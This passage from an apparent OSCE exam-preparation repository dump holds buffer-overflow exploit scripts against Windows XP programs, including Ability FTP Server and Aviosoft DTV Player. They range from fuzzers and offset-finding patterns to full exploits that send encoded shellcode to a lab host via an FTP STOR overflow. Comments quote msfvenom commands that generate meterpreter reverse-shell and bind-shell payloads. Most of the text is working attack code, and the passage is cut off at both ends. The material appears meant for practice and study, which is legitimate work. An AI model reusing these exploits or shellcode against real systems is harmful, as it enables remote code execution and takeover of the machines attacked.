k3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
 -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/whatever.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/tomabo_mp4_player/whatever.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/total_video_player/Settings.ini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/total_video_player/Settings.ini -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/total_video_player/total_vid_player_eip_overwrite.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 5000; # sets buffer size for consistent sized payload 4 | my $header = "[Support Groups]\r\nVideo="; # start of ini file 5 | my $footer = "\r\n[AssociateType]\r\nAssociateType =1"; # end of ini file (after buffer) 6 | my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"; 7 | 8 | my $sploit = $header.$junk.$footer; # build spoit portion of buffer 9 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk for consistent size 10 | my $buffer = $sploit.$fill; # build final buffer 11 | 12 | # write the exploit buffer to file 13 | my $file = 
"Settings.ini"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer) . "\n"; 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/3afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import ftplib 4 | from ftplib import FTP 5 | import struct 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | buffer = "A" *966 + "B" *4 + "C" *1000 10 | 11 | print "\nSending evil buffer..." 12 | s.connect(('172.16.73.129',21)) 13 | data = s.recv(1023) 14 | s.send('USER ftp\r\n') 15 | data = s.recv(1024) 16 | s.send('PASS ftp\r\n') 17 | data = s.recv(1024) 18 | s.send('STOR ' + buffer + '\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/4afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | shellcode=("\xda\xd8\xbf\x4b\x36\x12\x12\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x53\x83\xc0\x04\x31\x78\x13\x03\x33\x25\xf0\xe7\x3f\xa1\x76" 8 | "\x07\xbf\x32\x17\x81\x5a\x03\x17\xf5\x2f\x34\xa7\x7d\x7d\xb9" 9 | "\x4c\xd3\x95\x4a\x20\xfc\x9a\xfb\x8f\xda\x95\xfc\xbc\x1f\xb4" 10 | "\x7e\xbf\x73\x16\xbe\x70\x86\x57\x87\x6d\x6b\x05\x50\xf9\xde" 11 | "\xb9\xd5\xb7\xe2\x32\xa5\x56\x63\xa7\x7e\x58\x42\x76\xf4\x03" 12 | "\x44\x79\xd9\x3f\xcd\x61\x3e\x05\x87\x1a\xf4\xf1\x16\xca\xc4" 13 | "\xfa\xb5\x33\xe9\x08\xc7\x74\xce\xf2\xb2\x8c\x2c\x8e\xc4\x4b" 14 | "\x4e\x54\x40\x4f\xe8\x1f\xf2\xab\x08\xf3\x65\x38\x06\xb8\xe2" 15 | "\x66\x0b\x3f\x26\x1d\x37\xb4\xc9\xf1\xb1\x8e\xed\xd5\x9a\x55" 16 | 
"\x8f\x4c\x47\x3b\xb0\x8e\x28\xe4\x14\xc5\xc5\xf1\x24\x84\x81" 17 | "\x36\x05\x36\x52\x51\x1e\x45\x60\xfe\xb4\xc1\xc8\x77\x13\x16" 18 | "\x2e\xa2\xe3\x88\xd1\x4d\x14\x81\x15\x19\x44\xb9\xbc\x22\x0f" 19 | "\x39\x40\xf7\xba\x31\xe7\xa8\xd8\xbc\x57\x19\x5d\x6e\x30\x73" 20 | "\x52\x51\x20\x7c\xb8\xfa\xc9\x81\x43\x15\x56\x0f\xa5\x7f\x76" 21 | "\x59\x7d\x17\xb4\xbe\xb6\x80\xc7\x94\xee\x26\x8f\xfe\x29\x49" 22 | "\x10\xd5\x1d\xdd\x9b\x3a\x9a\xfc\x9b\x16\x8a\x69\x0b\xec\x5b" 23 | "\xd8\xad\xf1\x71\x8a\x4e\x63\x1e\x4a\x18\x98\x89\x1d\x4d\x6e" 24 | "\xc0\xcb\x63\xc9\x7a\xe9\x79\x8f\x45\xa9\xa5\x6c\x4b\x30\x2b" 25 | "\xc8\x6f\x22\xf5\xd1\x2b\x16\xa9\x87\xe5\xc0\x0f\x7e\x44\xba" 26 | "\xd9\x2d\x0e\x2a\x9f\x1d\x91\x2c\xa0\x4b\x67\xd0\x11\x22\x3e" 27 | "\xef\x9e\xa2\xb6\x88\xc2\x52\x38\x43\x47\x62\x73\xc9\xee\xeb" 28 | "\xda\x98\xb2\x71\xdd\x77\xf0\x8f\x5e\x7d\x89\x6b\x7e\xf4\x8c" 29 | "\x30\x38\xe5\xfc\x29\xad\x09\x52\x49\xe4") 30 | 31 | buffer = "A" *966 + "\x53\x93\x42\x7E" + '\x42'*16 + '\x90'*16 + shellcode + '\x42'*688 32 | 33 | print "\nSending evil buffer..." 
34 | s.connect(('172.16.73.129',21)) 35 | data = s.recv(1023) 36 | s.send('USER ftp\r\n') 37 | data = s.recv(1024) 38 | s.send('PASS ftp\r\n') 39 | data = s.recv(1024) 40 | s.send('STOR ' + buffer + '\r\n') 41 | s.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/5afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | shellcode = ("\xda\xd9\xd9\x74\x24\xf4\xbb\x49\x4f\x85\xae\x5a\x31\xc9\xb1" 7 | "\x52\x31\x5a\x17\x83\xc2\x04\x03\x13\x5c\x67\x5b\x5f\x8a\xe5" 8 | "\xa4\x9f\x4b\x8a\x2d\x7a\x7a\x8a\x4a\x0f\x2d\x3a\x18\x5d\xc2" 9 | "\xb1\x4c\x75\x51\xb7\x58\x7a\xd2\x72\xbf\xb5\xe3\x2f\x83\xd4" 10 | "\x67\x32\xd0\x36\x59\xfd\x25\x37\x9e\xe0\xc4\x65\x77\x6e\x7a" 11 | "\x99\xfc\x3a\x47\x12\x4e\xaa\xcf\xc7\x07\xcd\xfe\x56\x13\x94" 12 | "\x20\x59\xf0\xac\x68\x41\x15\x88\x23\xfa\xed\x66\xb2\x2a\x3c" 13 | "\x86\x19\x13\xf0\x75\x63\x54\x37\x66\x16\xac\x4b\x1b\x21\x6b" 14 | "\x31\xc7\xa4\x6f\x91\x8c\x1f\x4b\x23\x40\xf9\x18\x2f\x2d\x8d" 15 | "\x46\x2c\xb0\x42\xfd\x48\x39\x65\xd1\xd8\x79\x42\xf5\x81\xda" 16 | "\xeb\xac\x6f\x8c\x14\xae\xcf\x71\xb1\xa5\xe2\x66\xc8\xe4\x6a" 17 | "\x4a\xe1\x16\x6b\xc4\x72\x65\x59\x4b\x29\xe1\xd1\x04\xf7\xf6" 18 | "\x16\x3f\x4f\x68\xe9\xc0\xb0\xa1\x2e\x94\xe0\xd9\x87\x95\x6a" 19 | "\x19\x27\x40\x3c\x49\x87\x3b\xfd\x39\x67\xec\x95\x53\x68\xd3" 20 | "\x86\x5c\xa2\x7c\x2c\xa7\x25\x2f\xa1\xee\x35\x47\xc0\xf0\x24" 21 | "\xc4\x4d\x16\x2c\xe4\x1b\x81\xd9\x9d\x01\x59\x7b\x61\x9c\x24" 22 | "\xbb\xe9\x13\xd9\x72\x1a\x59\xc9\xe3\xea\x14\xb3\xa2\xf5\x82" 23 | "\xdb\x29\x67\x49\x1b\x27\x94\xc6\x4c\x60\x6a\x1f\x18\x9c\xd5" 24 | "\x89\x3e\x5d\x83\xf2\xfa\xba\x70\xfc\x03\x4e\xcc\xda\x13\x96" 25 | "\xcd\x66\x47\x46\x98\x30\x31\x20\x72\xf3\xeb\xfa\x29\x5d\x7b" 26 | 
"\x7a\x02\x5e\xfd\x83\x4f\x28\xe1\x32\x26\x6d\x1e\xfa\xae\x79" 27 | "\x67\xe6\x4e\x85\xb2\xa2\x7f\xcc\x9e\x83\x17\x89\x4b\x96\x75" 28 | "\x2a\xa6\xd5\x83\xa9\x42\xa6\x77\xb1\x27\xa3\x3c\x75\xd4\xd9" 29 | "\x2d\x10\xda\x4e\x4d\x31") 30 | 31 | buffer = "A" *966 + "\x0a\xaf\xd8\x77" + "\x90"*50 + shellcode + "\x90"*600 32 | 33 | print "\nSending evil buffer..." 34 | s.connect(('172.16.73.129',21)) 35 | data = s.recv(1023) 36 | s.send('USER ftp\r\n') 37 | data = s.recv(1024) 38 | s.send('PASS ftp\r\n') 39 | data = s.recv(1024) 40 | s.send('STOR ' + buffer + '\r\n') 41 | s.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_eip1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit Find Offset 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | print banner 16 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = ( 18 | 19 | offset = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 20 | 21 | #nowjump 22 | #bufferandshellcode 23 | sploit = offset 24 | 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | try: 27 | print "\nDestroy them with lazers..." 28 | s.connect(('172.16.73.129',21)) 29 | s.recv(1024) 30 | s.send('USER ftp\r\n') 31 | s.recv(1024) 32 | s.send('PASS ftp\r\n') 33 | s.recv(1024) 34 | s.send('STOR ' + sploit + '\r\n\n') 35 | s.recv(1024) 36 | s.send('QUIT\r\n') 37 | s.close 38 | print "\nFire in the hole! Go pick up the pieces!" 39 | except: 40 | print "ERROR! Shutting it dooooown.." 
41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 69413269 -> offset at 247 18 | offset = 'A'*966 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7e429353 or \x53\93\x42\x7e 21 | #nowjump = '\x53\x93\x42\x7e' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(1000) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER ftp\r\n') 33 | s.recv(1024) 34 | s.send('PASS ftp\r\n') 35 | s.recv(1024) 36 | s.send('STOR ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit Fuzzer 10 | 1. 
python ability_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | offset = "A" *5000 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER ftp\r\n') 29 | s.recv(1024) 30 | s.send('PASS ftp\r\n') 31 | s.recv(1024) 32 | s.send('STOR ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/afs2.2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import ftplib 4 | from ftplib import FTP 5 | import struct 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | buffer="A"*5000 10 | 11 | print "\nSending evil buffer..." 12 | s.connect(('172.16.73.129',21)) 13 | data = s.recv(1023) 14 | s.send('USER ftp\r\n') 15 | data = s.recv(1024) 16 | s.send('PASS ftp\r\n') 17 | data = s.recv(1024) 18 | s.send('STOR ' + buffer + '\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/afs2.34-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 5 | # Create an array of buffers, from 0 to 2000, with increments of 100. 
6 | buffer=["A"] 7 | counter=20 8 | 9 | while len(buffer) <= 30: 10 | buffer.append("A"*counter) 11 | counter=counter+100 12 | 13 | #Define the FTP commands to be fuzzed 14 | commands=["LIST, CWD"] 15 | 16 | # Run the fuzzing loop 17 | for command in commands: 18 | for string in buffer: 19 | print "Fuzzing " + command + " with length:" +str(len(string)) 20 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=s.connect(('172.16.73.129',21)) #IP Address of the victim 22 | s.recv(1024) 23 | s.send('USER anonymous\r\n') 24 | s.recv(1024) 25 | s.send('PASS anonymous\r\n') 26 | s.recv(1024) 27 | s.send(command + ' ' + string + '\r\n') 28 | s.recv(1024) 29 | s.send('QUIT\r\n') 30 | s.close() 31 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_badchars.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*253 7 | buffer += "B"*4 8 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1b\x1c\x1d\x1e\x1f" 9 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 10 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 11 | 
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 12 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 13 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 14 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 15 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 16 | 17 | file.write(buffer) 18 | 19 | file.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisfot_crash.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*5000 7 | 8 | file.write(buffer) 9 | 10 | file.close() 11 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_eip_b_crash.plf: -------------------------------------------------------------------------------- 1 | http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 
-------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_eip_b_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_eip_b_crash.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*253 7 | buffer += "B"*4 8 | buffer += "C"*300 9 | 10 | file.write(buffer) 11 | 12 | file.close() 13 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_shellcode_1.plf","wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c 6 | 7 | shellcode = ("\xbb\x12\xad\x81\x94\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" 8 | "\x53\x31\x58\x12\x03\x58\x12\x83\xd2\xa9\x63\x61\x2e\x59\xe1" 9 | "\x8a\xce\x9a\x86\x03\x2b\xab\x86\x70\x38\x9c\x36\xf2\x6c\x11" 10 | "\xbc\x56\x84\xa2\xb0\x7e\xab\x03\x7e\x59\x82\x94\xd3\x99\x85" 11 | "\x16\x2e\xce\x65\x26\xe1\x03\x64\x6f\x1c\xe9\x34\x38\x6a\x5c" 12 | "\xa8\x4d\x26\x5d\x43\x1d\xa6\xe5\xb0\xd6\xc9\xc4\x67\x6c\x90" 13 | "\xc6\x86\xa1\xa8\x4e\x90\xa6\x95\x19\x2b\x1c\x61\x98\xfd\x6c" 14 | "\x8a\x37\xc0\x40\x79\x49\x05\x66\x62\x3c\x7f\x94\x1f\x47\x44" 15 | 
"\xe6\xfb\xc2\x5e\x40\x8f\x75\xba\x70\x5c\xe3\x49\x7e\x29\x67" 16 | "\x15\x63\xac\xa4\x2e\x9f\x25\x4b\xe0\x29\x7d\x68\x24\x71\x25" 17 | "\x11\x7d\xdf\x88\x2e\x9d\x80\x75\x8b\xd6\x2d\x61\xa6\xb5\x39" 18 | "\x46\x8b\x45\xba\xc0\x9c\x36\x88\x4f\x37\xd0\xa0\x18\x91\x27" 19 | "\xc6\x32\x65\xb7\x39\xbd\x96\x9e\xfd\xe9\xc6\x88\xd4\x91\x8c" 20 | "\x48\xd8\x47\x38\x40\x7f\x38\x5f\xad\x3f\xe8\xdf\x1d\xa8\xe2" 21 | "\xef\x42\xc8\x0c\x3a\xeb\x61\xf1\xc5\x02\x2e\x7c\x23\x4e\xde" 22 | "\x28\xfb\xe6\x1c\x0f\x34\x91\x5f\x65\x6c\x35\x17\x6f\xab\x3a" 23 | "\xa8\xa5\x9b\xac\x23\xaa\x1f\xcd\x33\xe7\x37\x9a\xa4\x7d\xd6" 24 | "\xe9\x55\x81\xf3\x99\xf6\x10\x98\x59\x70\x09\x37\x0e\xd5\xff" 25 | "\x4e\xda\xcb\xa6\xf8\xf8\x11\x3e\xc2\xb8\xcd\x83\xcd\x41\x83" 26 | "\xb8\xe9\x51\x5d\x40\xb6\x05\x31\x17\x60\xf3\xf7\xc1\xc2\xad" 27 | "\xa1\xbe\x8c\x39\x37\x8d\x0e\x3f\x38\xd8\xf8\xdf\x89\xb5\xbc" 28 | "\xe0\x26\x52\x49\x99\x5a\xc2\xb6\x70\xdf\xf2\xfc\xd8\x76\x9b" 29 | "\x58\x89\xca\xc6\x5a\x64\x08\xff\xd8\x8c\xf1\x04\xc0\xe5\xf4" 30 | "\x41\x46\x16\x85\xda\x23\x18\x3a\xda\x61") 31 | 32 | buffer = "http://" 33 | buffer += "A"*253 34 | buffer += "\x53\x93\x42\x7e" 35 | buffer += "\x90"*100 36 | buffer += shellcode 37 | buffer += "C"*300 38 | 39 | file.write(buffer) 40 | 41 | file.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/badchars.txt: -------------------------------------------------------------------------------- 1 | \x00 2 | \x0a 3 | \x1a 4 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/blazeexploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/blazeexploit.zip 
-------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_crash.plf: -------------------------------------------------------------------------------- 1 | 